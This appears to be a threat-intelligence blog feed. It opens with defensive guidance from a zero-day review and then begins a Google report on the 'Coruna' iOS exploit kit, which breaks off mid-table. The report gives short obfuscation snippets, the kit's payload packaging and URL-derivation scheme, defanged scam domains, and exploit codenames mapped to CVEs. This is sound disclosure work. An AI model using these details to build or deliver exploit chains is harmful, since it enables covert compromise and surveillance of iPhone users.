aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Turn off cellular, WiFi and bluetooth when under increased risk of close proximity attacks.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Apply patches as soon as they become available.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Use ad blockers, configure Apple ad privacy settings, and enable the Android privacy sandbox options when possible.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enable Android Advanced Protection Mode and iOS Lockdown Mode.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Remove applications, and disable services and features- including ones enabled by default- when not used.</span></p> </li> </ul> </li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">2. Advanced Detection &amp; Behavioral Monitoring</span></p> <ul> <li style="list-style-type: none;"> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Infrastructure:</span></p> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enforce strict driver blocklists and flag anomalous kernel-level behavior that traditional EDR might overlook.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Establish a baseline for system processes in order to be able to flag "Living off the Land" (LotL) activity and other persistence mechanisms.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deploy canary tokens and files to collect high-fidelity alerts of lateral movement.</span></p> </li> </ul> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Personal devices:</span></p> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Seek expert advice (e.g., Amnesty, CitizenLab, and Access Now) when receiving suspicious links or attachments, as well as when observing suspicious application and or operating system crashes.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enroll in </span><a href="https://landing.google.com/intl/en_in/advancedprotection/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google’s Advanced Protection Program</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enable </span><a href="https://support.google.com/android/answer/16339980?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Android Advanced Protection Mode</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enable </span><a href="https://support.google.com/accounts/answer/11577602?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Enhanced Safe Browsing in Chrome</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enable </span><a href="https://www.apple.com/legal/privacy/data/en/safari/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Safari fraudulent website warning</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Enable </span><a href="https://learn.microsoft.com/en-us/deployedge/microsoft-edge-security-browse-safer" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Edge enhanced security protections</span></a><span style="vertical-align: baseline;">.</span></p> </li> </ul> </li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">3. Operational Response</span></p> <ul> <li style="list-style-type: none;"> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Infrastructure:</span></p> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Maintain a Software Bill of Materials (SBoM) to reference and locate affected libraries of disclosed zero-days (e.g., Log4j) across the environment.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Establish a process for bypassing standard change management when vulnerabilities require immediate attention.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">If a patch is unavailable, isolate systems and components with stop-gap measures such as disabling specific services or blocking specific ports at the perimeter.</span></p> </li> </ul> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Personal devices:</span></p> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Reboot phone regularly.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Do not click on links or download attachments from unknown contacts.</span></p> </li> </ul> </li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">Prioritization is a consistent struggle for most organizations due to limited resources requiring deciding what solutions are implemented–and for every choice of where to put resources, a different security need is neglected. Know your threats and your attack surface in order to prioritize decisions for best defending your systems and infrastructure.</span></p></div>Thu, 05 Mar 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review/Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit/<div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Google Threat Intelligence Group (GTIG) has identified a new and powerful exploit kit targeting Apple </span><span style="vertical-align: baseline;">iPhone models running iOS version 13.0 (released in September 2019) up to version 17.2.1 (released in December 2023)</span><span style="vertical-align: baseline;">. </span><span style="vertical-align: baseline;">The exploit kit, named “Coruna” by its developers, contained five full iOS exploit chains and a total of 23 exploits. </span><span style="vertical-align: baseline;">The core technical value of this exploit kit lies in its comprehensive collection of iOS exploits, with the most advanced ones using non-public exploitation techniques and mitigation bypasses. </span></p> <p><span style="vertical-align: baseline;">The Coruna exploit kit provides </span><a href="https://blog.google/threat-analysis-group/state-backed-attackers-and-commercial-surveillance-vendors-repeatedly-use-the-same-exploits/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">another example of how sophisticated capabilities proliferate</span></a><span style="vertical-align: baseline;">. Over the course of 2025, GTIG tracked its use in highly targeted operations initially conducted by a customer of a </span><a href="https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/Buying_Spying_-_Insights_into_Commercial_Surveillance_Vendors_-_TAG_report.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">surveillance vendor</span></a><span style="vertical-align: baseline;">, then observed its deployment in watering hole attacks targeting Ukrainian users by UNC6353, a suspected Russian espionage group. We then retrieved the complete exploit kit when it was later used in broad-scale campaigns by UNC6691, a financially motivated threat actor operating from China. How this proliferation occurred is unclear, but suggests an</span><span style="vertical-align: baseline;"> active market for "second hand" zero-day exploits. Beyond these identified exploits, multiple threat actors have now acquired advanced exploitation techniques that can be re-used and modified with newly identified vulnerabilities.</span></p> <p><span style="vertical-align: baseline;">Following our </span><a href="https://about.google/appsecurity/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">disclosure policy</span></a><span style="vertical-align: baseline;">, we are sharing our research to raise awareness and advance security across the industry. We have also added all identified websites and domains to </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Safe Browsing</span></a><span style="vertical-align: baseline;"> to safeguard users from further exploitation. The Coruna exploit kit is not effective against the latest version of iOS, and iPhone users are strongly urged to update their devices to the latest version of iOS. In instances where an update is not possible, it is recommended that </span><a href="https://support.apple.com/en-us/105120" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Lockdown Mode</span></a><span style="vertical-align: baseline;"> be enabled for enhanced security.</span></p> <h3><span style="vertical-align: baseline;">Discovery Timeline</span></h3></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/coruna-fig1.max-1000x1000.png" alt="discovery timeline"> </a> <figcaption class="article-image__caption "><p data-block-key="7gxmk">Figure 1: Coruna iOS exploit kit timeline</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Initial Discovery: The Commercial Surveillance Vendor Role</span></h3> <p><span style="vertical-align: baseline;">In February 2025, we captured parts of an iOS exploit chain used by a customer of a surveillance company. The exploits were integrated into a previously unseen JavaScript framework that used simple but unique JavaScript obfuscation techniques.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>[16, 22, 0, 69, 22, 17, 23, 12, 6, 17].map(x =&gt; {return String.fromCharCode(x ^ 101);}).join("")</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>i.p1=(1111970405 ^ 1111966034);</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">The JavaScript framework used these constructs to encode strings and integers</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The framework starts a fingerprinting module collecting a variety of data points to determine if the device is real and what specific iPhone model and iOS software version it is running. Based on the collected data, it loads the appropriate WebKit remote code execution (RCE) exploit, followed by a pointer authentication code (PAC) bypass as seen in Figure 2 from the deobfuscated JavaScript.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/coruna-fig2b.max-1000x1000.png" alt="Deobfuscated JavaScript of the Coruna exploit kit"> </a> <figcaption class="article-image__caption "><p data-block-key="uo7k2">Figure 2: Deobfuscated JavaScript of the Coruna exploit kit</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">At that time, we recovered the WebKit RCE delivered to a device running iOS 17.2 and determined it was CVE-2024-23222, a vulnerability previously identified as a zero-day that was addressed by Apple on Jan. 22, 2024 in iOS 17.3 without crediting any external researchers. Figure 3 shows the beginning of the RCE exploit exactly how it was delivered in-the-wild with our annotations.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/coruna-fig3.max-1000x1000.png" alt="How the RCE exploit leveraging CVE-2024-23222 was delivered in the wild"> </a> <figcaption class="article-image__caption "><p data-block-key="uo7k2">Figure 3: How the RCE exploit leveraging CVE-2024-23222 was delivered in the wild</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Government-Backed Attacker Usage</span></h3> <p><span style="vertical-align: baseline;">In summer 2025, we noticed the same JavaScript framework hosted on cdn.uacounter[.]com, a website loaded as a hidden iFrame on many compromised Ukrainian websites, ranging from industrial equipment and retail tools to local services and ecommerce websites. The framework was only delivered to selected iPhone users from a specific geolocation.</span></p> <p><span style="vertical-align: baseline;">The framework was identical and delivered the same set of exploits. We collected WebKit RCEs, which included CVE-2024-23222, CVE-2022-48503, and CVE-2023-43000, before the server was shut down. We alerted and worked with CERT-UA to clean up all compromised websites.</span></p> <h3><span style="vertical-align: baseline;">Full Exploit Chain Collection From Chinese Scam Websites</span></h3> <p><span style="vertical-align: baseline;">At the end of the year, we identified the JavaScript framework on a very large set of fake Chinese websites mostly related to finance, dropping the exact same iOS exploit kit. The websites tried to convince users to visit the websites with iOS devices, as seen in Figure 4, taken from a fake WEEX crypto exchange website.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/coruna-fig4.max-1000x1000.png" alt="Pop-up on a fake cryptocurrency exchange website trying to drive users to the exploits"> </a> <figcaption class="article-image__caption "><p data-block-key="uo7k2">Figure 4: Pop-up on a fake cryptocurrency exchange website trying to drive users to the exploits</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Upon accessing these websites via an iOS device and regardless of their geolocation, a hidden iFrame is injected, delivering the exploit kit. As an example, Figure 5 shows the same CVE-2024-23222 exploit as it was found on</span><span style="vertical-align: baseline;"> 3v5w1km5gv[.]xyz.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/coruna-fig5.max-1000x1000.png" alt="Screenshot of CVE-2024-23222 exploit recovered from a scam site"> </a> <figcaption class="article-image__caption "><p data-block-key="8guci">Figure 5: Screenshot of CVE-2024-23222 exploit recovered from a scam site</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We retrieved all the obfuscated exploits, including ending payloads. Upon further analysis, we noticed an instance where the actor deployed the debug version of the exploit kit, leaving in the clear all of the exploits, including their internal code names. That’s when we learned that the exploit kit was likely named Coruna internally. In total, we collected a few hundred samples covering a total of five full iOS exploit chains. The exploit kit is able to target various iPhone models running iOS version 13.0 (released in September 2019) up to version 17.2.1 (released in December 2023).</span></p> <p><span style="vertical-align: baseline;">In the subsequent sections, we will provide a quick description of the framework, a breakdown of the exploit chains, and the associated implants we have captured. Our analysis of the collected data is ongoing, and we anticipate publishing additional technical specifications via new blog entries or </span><a href="https://googleprojectzero.github.io/0days-in-the-wild/rca.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">root cause analyses</span></a><span style="vertical-align: baseline;"> (RCAs).</span></p> <h3><span style="vertical-align: baseline;">The Coruna Exploit Kit</span></h3> <p><span style="vertical-align: baseline;">The framework surrounding the exploit kit is extremely well engineered; the exploit pieces are all connected naturally and combined together using common utility and exploitation frameworks. The kit performs the following unique actions:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Bailing out if the device is in Lockdown Mode, or the user is in private browsing.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A unique and hard-coded cookie is used along the way to generate resource URLs.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Resources are referred to by a hash, which needs to be derived with the unique cookie using </span><code style="vertical-align: baseline;">sha256(COOKIE + ID)[:40]</code><span style="vertical-align: baseline;"> to get their URL.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">RCE and PAC bypasses are delivered unencrypted.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The kit contains a binary loader to load the appropriate exploit chain post RCE within WebKit. In this case, binary payloads:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Have unique metadata indicating what they really are, what chips and iOS versions they support.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Are served from URLs that end with .min.js.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Are encrypted using ChaCha20 with a unique key per blob.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Are packaged in a custom file format starting with 0xf00dbeef as header.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Are compressed with the Lempel–Ziv–Welch (LZW) algorithm.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Figure 6 shows what an infection of an iPhone XR running iOS 15.8.5 looks like from a networking point of view, with our annotation of the different parts when browsing one of these fake financial websites.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/coruna-fig6.max-1000x1000.png" alt="Coruna exploit chain delivered on iOS 15.8.5"> </a> <figcaption class="article-image__caption "><p data-block-key="deqzs">Figure 6: Coruna exploit chain delivered on iOS 15.8.5</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">The Exploits and Their Code Names</span></h3> <p><span style="vertical-align: baseline;">The core technical value of this exploit kit lies in its comprehensive collection of iOS exploits. The exploits feature extensive documentation, including docstrings and comments authored in native English. The most advanced ones are using non-public exploitation techniques and mitigation bypasses. The following table provides a summary of our ongoing analysis regarding the various exploit chains; however, as the full investigation is still in progress, certain CVE associations may be subject to revision. There are in total 23 exploits covering versions from iOS 13 to iOS 17.2.1.</span></p></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Type</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Codename</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Targeted versions (inclusive)</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Fixed version</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">CVE</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent R/W</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">buffout</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">13 → 15.1.1</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2021-30952</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent R/W</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">jacurutu</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15.2 → 15.5</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15.6</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2022-48503</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent R/W</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">bluebird</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15.6 → 16.1.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent R/W</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">terrorbird</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.2 → 16.5.1</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.6</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2023-43000</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent R/W</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">cassowary</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.6 → 17.2.1</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.7.5, 17.3</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2024-23222</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent PAC bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">breezy</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">13 → 14.x</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">?</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent PAC bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">breezy15</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15 → 16.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">?</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent PAC bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">seedbell</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.3 → 16.5.1</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">?</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent PAC bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">seedbell_16_6</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.6 → 16.7.12</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">?</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent PAC bypass</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">seedbell_17</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">17 → 17.2.1</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">?</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent sandbox escape</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IronLoader</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.0 → 16.3.1</span><span style="vertical-align: baseline;">16.4.0 (&lt;= A12)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">15.7.8, 16.5</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2023-32409</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WebContent sandbox escape</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">NeuronLoader</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16.4.0 → 16.6.1 (A13-A16)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">17.0</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Neutron</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">13.X</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">14.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2020-27932</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PE (infoleak)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Dynamo</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">13.X</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">14.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2020-27950</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Pendulum</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">14 → 14.4.x</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">14.7</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No CVE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Photon</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span 